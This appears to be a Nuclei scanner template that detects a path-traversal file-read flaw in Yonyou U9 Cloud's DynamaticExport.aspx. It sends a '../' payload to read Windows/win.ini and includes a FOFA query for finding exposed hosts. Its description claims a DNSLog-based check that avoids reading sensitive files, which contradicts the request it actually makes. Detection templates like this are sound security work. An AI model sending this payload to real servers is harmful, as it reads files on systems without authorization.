http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - '[fonts]'
            - '[extensions]'
        - status:
            - 200
          type: status
      matchers-condition: and
      method: GET
      path:
        - '{{BaseURL}}/print/DynamaticExport.aspx?filePath=../../../../../../../../../../../../Windows/win.ini'
id: yonyou-u9cloud-lfi-DynamaticExport
info:
    author: onewin
    description: |
        通过DNSLog技术验证文件读取漏洞，避免直接读取敏感文件
    metadata:
        fofa-query: body="logo-u9.png" || body="/U9/css/"
    name: 用友U9 Cloud DynamaticExport文件读取漏洞
    severity: high
    tags:
        - Yonyou-U9
